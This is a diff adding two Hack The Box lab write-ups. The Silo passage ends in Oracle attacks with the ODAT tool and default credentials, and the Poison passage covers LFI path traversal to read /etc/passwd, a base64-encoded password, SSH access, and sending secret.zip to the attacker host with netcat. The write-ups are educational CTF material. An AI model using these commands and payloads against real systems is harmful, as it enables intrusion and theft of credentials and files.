+ remote: Compressing objects: 100% (122/122), done.
+ remote: Total 900 (delta 97), reused 112 (delta 58), pack-reused 720
+ Receiving objects: 100% (900/900), 934.49 KiB | 1.77 MiB/s, done.
+ Resolving deltas: 100% (531/531), done.
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Silo]
+ → cd odat
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
+ → git submodule init [c47824b]
+ Submodule 'docs' (https://github.com/quentinhardy/odat.wiki.git) registered for path 'docs'
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
+ → git submodule update [c47824b]
+ Cloning into '/home/nihilist/_HTB/Silo/odat/docs'...
+ Submodule path 'docs': checked out '402d0446a807f8c75e07addaf0887a82c739bf1f'
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
+ → sudo apt install libaio1 python3-dev alien python3-pip
+
+
+Once the dependencies installed, we download the rpm file from the oracle [website](https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html)
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
+ → wget https://download.oracle.com/otn_software/linux/instantclient/19600/oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm
+ --2020-03-16 12:51:55-- https://download.oracle.com/otn_software/linux/instantclient/19600/oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm
+ Resolving download.oracle.com (download.oracle.com)... 23.212.224.6
+ Connecting to download.oracle.com (download.oracle.com)|23.212.224.6|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 27978612 (27M) [application/x-redhat-package-manager]
+ Saving to: ‘oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm’
+
+ oracle-instantclien 100%[===================>] 26.68M 2.38MB/s in 11s
+
+ 2020-03-16 12:52:08 (2.34 MB/s) - ‘oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm’ saved [27978612/27978612]
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
+ → sudo alien --to-deb oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm
+ Warning: Skipping conversion of scripts in package oracle-instantclient19.6-basiclite: postinst postrm
+ Warning: Use the --scripts parameter to include the scripts.
+ oracle-instantclient19.6-basiclite_19.6.0.0.0-2_amd64.deb generated
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ?
+ → sudo dpkg -i oracle-instantclient19.6-basiclite_19.6.0.0.0-2_amd64.deb
+ Selecting previously unselected package oracle-instantclient19.6-basiclite.
+ (Reading database ... 572297 files and directories currently installed.)
+ Preparing to unpack oracle-instantclient19.6-basiclite_19.6.0.0.0-2_amd64.deb ...
+ Unpacking oracle-instantclient19.6-basiclite (19.6.0.0.0-2) ...
+ Setting up oracle-instantclient19.6-basiclite (19.6.0.0.0-2) ...
+ Processing triggers for libc-bin (2.29-10) ...
+
+
+
+Now that we have installed it, we edit our /etc/profle to define the Oracle env variables:
+
+
+ export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
+ export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
+ export PATH=$ORACLE_HOME/bin:$PATH
+
+
+` 
+
+Next step is creating /etc/ld.so.conf.d/oracle.conf and adding the path to Oracle Home:
+
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → sudo nano /etc/ld.so.conf.d/oracle.conf
+
+
+Adding the path to the Oracle Home directory:
+
+
+ /usr/lib/oracle/19.6/client64/lib/
+
+
+Next we update the ldpath:
+
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → sudo ldconfig
+
+
+And finally we pip3 install cx_oracle and by testing it we see that we didn't have any problems so far:
+
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → sudo -s [c47824b]
+ Starting ssh-agent...
+ Identity added: /root/.ssh/id_rsa (root@prometheus)
+ Identity added: /root/.ssh/id_ed25519 (root@prometheus)
+
+ λ root [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → source /etc/profile [c47824b]
+ # pip3 install cx_Oracle [c47824b]
+ Collecting cx_Oracle
+ Downloading https://files.pythonhosted.org/packages/c9/ba/0fb63d616c2856016c13615ac43209b1909b7dbd8c5c461a79922e276678/cx_Oracle-7.3.0-cp37-cp37m-manylinux1_x86_64.whl (742kB)
+ 100% |████████████████████████████████| 747kB 744kB/s
+ Installing collected packages: cx-Oracle
+ Successfully installed cx-Oracle-7.3.0
+ # python3 -c 'import cx_Oracle' [c47824b]
+ #
+
+
+Next up we install the remaining dependencies we need :
+
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → sudo apt install python3-scapy [c47824b]
+ Reading package lists... Done
+ Building dependency tree
+ Reading state information... Done
+ python3-scapy is already the newest version (2.4.3-3).
+ python3-scapy set to manually installed.
+ The following packages were automatically installed and are no longer required:
+ b43-fwcutter chromium-common chromium-sandbox firmware-b43-installer firmware-b43legacy-installer
+ gnome-brave-icon-theme gnome-colors-common libdns-export1107 libdns1107 libexiv2-14 libicu57 libisc-export1104
+ libisc1104 libjs-jquery-easing libjs-jquery-fancybox libjs-jquery-mousewheel libmicrodns0 libmysofa0 libradare2-3.9
+ libu2f-udev python-apt python-asn1crypto python3-pycountry python3-simplegeneric ruby-diff-lcs ruby-docile
+ ruby-rspec-expectations ruby-rspec-support ruby-simplecov ruby-simplecov-html system-config-printer
+ Use 'sudo apt autoremove' to remove them.
+ 0 upgraded, 0 newly installed, 0 to remove and 123 not upgraded.
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → sudo pip3 install colorlog termcolor pycrypto passlib [c47824b]
+ Collecting colorlog
+ Downloading https://files.pythonhosted.org/packages/00/0d/22c73c2eccb21dd3498df7d22c0b1d4a30f5a5fb3feb64e1ce06bc247747/colorlog-4.1.0-py2.py3-none-any.whl
+ Requirement already satisfied: termcolor in /usr/lib/python3/dist-packages (1.1.0)
+ Requirement already satisfied: pycrypto in /usr/lib/python3/dist-packages (2.6.1)
+ Requirement already satisfied: passlib in /usr/lib/python3/dist-packages (1.7.2)
+ Installing collected packages: colorlog
+ Successfully installed colorlog-4.1.0
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → sudo pip3 install argcomplete && sudo activate-global-python-argcomplete [c47824b]
+ Requirement already satisfied: argcomplete in /usr/lib/python3/dist-packages (1.8.1)
+ Installing bash completion script /etc/bash_completion.d/python-argcomplete.sh
+
+
+
+From there we need to install the development version of pyinstaller (http://www.pyinstaller.org/) for python3.
+
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → pip3 install pyinstaller [c47824b]
+ Collecting pyinstaller
+ Downloading https://files.pythonhosted.org/packages/3c/c9/c3f9bc64eb11eee6a824686deba6129884c8cbdf70e750661773b9865ee0/PyInstaller-3.6.tar.gz (3.5MB)
+ 100% |████████████████████████████████| 3.5MB 206kB/s
+ Installing build dependencies ... done
+ Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from pyinstaller) (44.0.0)
+ Collecting altgraph (from pyinstaller)
+ Downloading https://files.pythonhosted.org/packages/ee/3d/bfca21174b162f6ce674953f1b7a640c1498357fa6184776029557c25399/altgraph-0.17-py2.py3-none-any.whl
+ Building wheels for collected packages: pyinstaller
+ Running setup.py bdist_wheel for pyinstaller ... done
+ Stored in directory: /home/nihilist/.cache/pip/wheels/62/fe/62/4c0f196d1e0dd689e097449bc81d7d585a7de7dd86b081b80b
+ Successfully built pyinstaller
+ Installing collected packages: altgraph, pyinstaller
+ The scripts pyi-archive_viewer, pyi-bindepend, pyi-grab_version, pyi-makespec, pyi-set_version and pyinstaller are installed in '/home/nihilist/.local/bin' which is not on PATH.
+ Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
+ Successfully installed altgraph-0.17 pyinstaller-3.6
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → ./odat.py -h [c47824b]
+ ERROT: Python 3 has to be used for this version of ODAT
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → python3 odat.py -h
+
+
+AND FINALLY we are able to use the Oracle Database Attacking Tool odat.py:
+
+
+ λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
+ → python3 odat.py -h [c47824b]
+ odat.py:52: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
+ import imp
+ usage: odat.py [-h] [--version]
+ {all,tnscmd,tnspoison,sidguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
+ ...
+
+ _ __ _ ___
+ / \| \ / \|_ _|
+ ( o ) o ) o || |
+ \_/|__/|_n_||_|
+ -------------------------------------------
+ _ __ _ ___
+ / \ | \ / \ |_ _|
+ ( o ) o ) o | | |
+ \_/racle |__/atabase |_n_|ttacking |_|ool
+ -------------------------------------------
+
+ By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com)
+
+ positional arguments:
+ {all,tnscmd,tnspoison,sidguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
+
+ Choose a main command
+ all to run all modules in order to know what it is possible to do
+ tnscmd to communicate with the TNS listener
+ tnspoison to exploit TNS poisoning attack
+ sidguesser to know valid SIDs
+ passwordguesser to know valid credentials
+ utlhttp to send HTTP requests or to scan ports
+ httpuritype to send HTTP requests or to scan ports
+ utltcp to scan ports
+ ctxsys to read files
+ externaltable to read files or to execute system commands/scripts
+ dbmsxslprocessor to upload files
+ dbmsadvisor to upload files
+ utlfile to download/upload/delete files
+ dbmsscheduler to execute system commands without a standard output
+ java to execute system commands
+ passwordstealer to get hashed Oracle passwords
+ oradbg to execute a bin or script
+ dbmslob to download files
+ stealremotepwds to steal hashed passwords thanks an authentication sniffing (CVE-2012-3137)
+ userlikepwd to try each Oracle username stored in the DB like the corresponding pwd
+ smb to capture the SMB authentication
+ privesc to gain elevated access
+ cve to exploit a CVE
+ search to search in databases, tables and columns
+ unwrapper to unwrap PL/SQL source code (no for 9i version)
+ clean clean traces and logs
+
+ optional arguments:
+ -h, --help show this help message and exit
+ --version show program's version number and exit
+
+
+
+Let's keep in mind that Oracle databases have a few possible default credentials :
+
+
+ SYSTEM:MANAGER
+ SCOTT:TIGER
+ SYS:CHANGE_ON_INSTALL
+ OUTLN:OUTLN
+ DBSNMP:DBSNMP
+ CTXSYS:CTXSYS
+ MDSYS:MDSYS
+
+
+so we try them manually one by one, until we find that scott:tiger are the correct credentials: Although they may be the correct credentials, we do not know what is the user on the box, so we create a .bat script to be able to list the directories in C:\Users\ :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
+ → echo 'dir /a c:\Users\' > nihilist.bat
+
+
+We upload it using odat.py's dbmsxslprocessor :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
+ → python3 odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "c:/" nihilist.bat /home/nihilist/_HTB/Silo/odat/nihilist.bat --sysdba
+
+ [1] (10.10.10.82:1521): Put the /home/nihilist/_HTB/Silo/odat/nihilist.bat local file in the c:/ path (named nihilist.bat) of the 10.10.10.82 server
+ [+] The /home/nihilist/_HTB/Silo/odat/nihilist.bat local file was put in the remote c:/ path (named nihilist.bat)
+
+
+
+Now we use it to list the user directories :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
+ → python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --exec "dir C:/" nihilist.bat --sysdba
+
+
+And looking at the results, we get the username "Phineas" so we grab his user flag:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
+ → python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --getFile "c:/Users/Phineas/Desktop" "user.txt" "spz.io" --sysdba
+
+ [1] (10.10.10.82:1521): Read the user.txt file stored in the c:/Users/Phineas/Desktop path
+ [+] Data stored in the remote file user.txt stored in c:/Users/Phineas/Desktop
+ 92XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the user flag !
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
+ → sudo python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --getFile "c:/Users/Administrator/Desktop" "root.txt" "spz.io" --sysdba
+
+ [1] (10.10.10.82:1521): Read the root.txt file stored in the c:/Users/Administrator/Desktop path
+ [+] Data stored in the remote file root.txt stored in c:/Users/Administrator/Desktop
+ cdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the root flag !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/24.md b/Medium/24.md
new file mode 100644
index 0000000..0c0c6f8
--- /dev/null
+++ b/Medium/24.md
@@ -0,0 +1,361 @@
+# Poison Writeup
+
+
+
+## Introduction :
+
+Poison is a Medium FreeBSD box released back in March 2018
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → nmap -F 10.10.10.84 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 13:57 GMT
+ Nmap scan report for 10.10.10.84
+ Host is up (0.10s latency).
+ Not shown: 98 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → nmap -sCV -Pn 10.10.10.84 -p22,80
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 13:57 GMT
+ Nmap scan report for 10.10.10.84
+ Host is up (0.094s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
+ | 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
+ |_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
+ 80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
+ |_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
+ |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
+ Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.95 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it :
+
+
+
+Looks like a basic php webpage, we are hinted towards listfiles.php so let's check it out :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → curl http://10.10.10.84/listfiles.php
+ Array
+ (
+ [0] => .
+ [1] => ..
+ [2] => browse.php
+ [3] => index.php
+ [4] => info.php
+ [5] => ini.php
+ [6] => listfiles.php
+ [7] => phpinfo.php
+ [8] => pwdbackup.txt
+ )
+
+
+
+Here we see 2 interesting things: browse.php et pwdbackup.txt so let's use browse.php to print out pwdbackup.txt:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → curl http://10.10.10.84/browse.php\?file\=pwdbackup.txt
+ This password is secure, it's encoded atleast 13 times.. what could go wrong really..
+
+ Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
+ bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
+ bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
+ M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
+ WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
+ eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
+ WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
+ MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
+ T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
+ WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
+ WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
+ NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
+ Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
+ WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
+ VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
+ Ukd4RVdub3dPVU5uUFQwSwo=
+
+
+So here we have a password that has been encoded 13 times with base64 so let's decode it fairly easily:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → nano passwd
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → cat passwd
+ Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
+ bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
+ bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
+ M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
+ WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
+ eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
+ WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
+ MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
+ T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
+ WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
+ WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
+ NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
+ Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
+ WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
+ VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
+ Ukd4RVdub3dPVU5uUFQwSwo=
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → cat passwd |base64 -d|base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d |base64 -d
+ Charix!2#4%6&8(0
+
+
+And we have a password to work with ! Charix!2#4%6&8(0
+
+Now let's check if there are any LFI Vulnerabilities with the browse.php file which we suspect there is :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → curl http://10.10.10.84/browse.php\?file\=../../../../../../../etc/passwd
+ # $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
+ #
+ root:*:0:0:Charlie &:/root:/bin/csh
+ toor:*:0:0:Bourne-again Superuser:/root:
+ daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
+ operator:*:2:5:System &:/:/usr/sbin/nologin
+ bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
+ tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
+ kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
+ games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
+ news:*:8:8:News Subsystem:/:/usr/sbin/nologin
+ man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
+ sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
+ smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
+ mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
+ bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
+ unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
+ proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
+ _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
+ _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
+ uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
+ pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
+ auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
+ www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
+ _ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
+ hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
+ nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
+ _tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
+ messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
+ avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
+ cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
+ charix:*:1001:1001:charix:/home/charix:/bin/csh
+
+
+
+There is ! We also have the username charix to work with, so let's log onto the box via ssh:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → ssh charix@10.10.10.84
+ The authenticity of host '10.10.10.84 (10.10.10.84)' cant be established.
+ ECDSA key fingerprint is SHA256:rhYtpHzkd9nBmOtN7+ft0JiVAu8qnywLb48Glz4jZ8c.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.84' (ECDSA) to the list of known hosts.
+ Password for charix@Poison:
+ Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
+ FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
+
+ Welcome to FreeBSD!
+
+ Release Notes, Errata: https://www.FreeBSD.org/releases/
+ Security Advisories: https://www.FreeBSD.org/security/
+ FreeBSD Handbook: https://www.FreeBSD.org/handbook/
+ FreeBSD FAQ: https://www.FreeBSD.org/faq/
+ Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
+ FreeBSD Forums: https://forums.FreeBSD.org/
+
+ Documents installed with the system are in the /usr/local/share/doc/freebsd/
+ directory, or can be installed later with: pkg install en-freebsd-doc
+ For other languages, replace "en" with a language code like de or fr.
+
+ Show the version of FreeBSD installed: freebsd-version ; uname -a
+ Please include that output and any error messages when posting questions.
+ Introduction to manual pages: man man
+ FreeBSD directory layout: man hier
+
+ Edit /etc/motd to change this login announcement.
+ To see the last 10 lines of a long file, use "tail filename". To see the
+ first 10 lines, use "head filename".
+ -- Dru
+ charix@Poison:~ % cat user.txt
+ eaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to gain root access onto this box wefirst need to take a look around the charix user's home directory.
+
+
+ charix@Poison:~ % ls -lash
+ total 48
+ 4 drwxr-x--- 2 charix charix 512B Mar 19 2018 .
+ 4 drwxr-xr-x 3 root wheel 512B Mar 19 2018 ..
+ 4 -rw-r----- 1 charix charix 1.0K Mar 19 2018 .cshrc
+ 0 -rw-rw---- 1 charix charix 0B Mar 19 2018 .history
+ 4 -rw-r----- 1 charix charix 254B Mar 19 2018 .login
+ 4 -rw-r----- 1 charix charix 163B Mar 19 2018 .login_conf
+ 4 -rw-r----- 1 charix charix 379B Mar 19 2018 .mail_aliases
+ 4 -rw-r----- 1 charix charix 336B Mar 19 2018 .mailrc
+ 4 -rw-r----- 1 charix charix 802B Mar 19 2018 .profile
+ 4 -rw-r----- 1 charix charix 281B Mar 19 2018 .rhosts
+ 4 -rw-r----- 1 charix charix 849B Mar 19 2018 .shrc
+ 4 -rw-r----- 1 root charix 166B Mar 19 2018 secret.zip
+ 4 -rw-r----- 1 root charix 33B Mar 19 2018 user.txt
+
+
+
+Here we see an interesting file secret.zip that we'll try to download locally:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → wget "http://10.10.10.84/browse.php?file=../../../../../../../home/charix/secret.zip"
+ --2020-03-16 14:23:51-- http://10.10.10.84/browse.php?file=../../../../../../../home/charix/secret.zip
+ Connecting to 10.10.10.84:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 423 [text/html]
+ Saving to: ‘browse.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fhome%2Fcharix%2Fsecret.zip’
+
+ browse.php?file=..%2F..%2F..%2 100%[==================================================>] 423 --.-KB/s in 0s
+
+ 2020-03-16 14:23:51 (28.1 MB/s) - ‘browse.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fhome%2Fcharix%2Fsecret.zip’ saved [423/423]
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → ls
+ 'browse.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fhome%2Fcharix%2Fsecret.zip' nihilist.sh passwd
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → cat browse.php\?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fhome%2Fcharix%2Fsecret.zip
+
+
+ **Warning** : include(../../../../../../../home/charix/secret.zip): failed to open stream: Permission denied in **/usr/local/www/apache24/data/browse.php** on line **2**
+
+
+
+ **Warning** : include(): Failed opening '../../../../../../../home/charix/secret.zip' for inclusion (include_path='.:/usr/local/www/apache24/data') in **/usr/local/www/apache24/data/browse.php** on line **2**
+
+
+
+
+Although as you can imagine, we (the web user) are not the charix user ! Therefore we cannot access his directory in /home, so instead we'll use netcat which is available for us on the machine to get send it to us locally:
+
+_Terminal 1:_
+
+
+ charix@Poison:~ % cat secret.zip | nc 10.10.14.10 9001
+
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → nc -lvnp 9001 > secret.zip
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9001
+ Ncat: Listening on 0.0.0.0:9001
+ Ncat: Connection from 10.10.10.84.
+ Ncat: Connection from 10.10.10.84:54774.
+ ^C
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Poison]
+ → file secret.zip
+ secret.zip: Zip archive data, at least v2.0 to extract
+
+
+
+We unzip it with the password we found earlier ( Charix!2#4%6&8(0 ) :
+
+
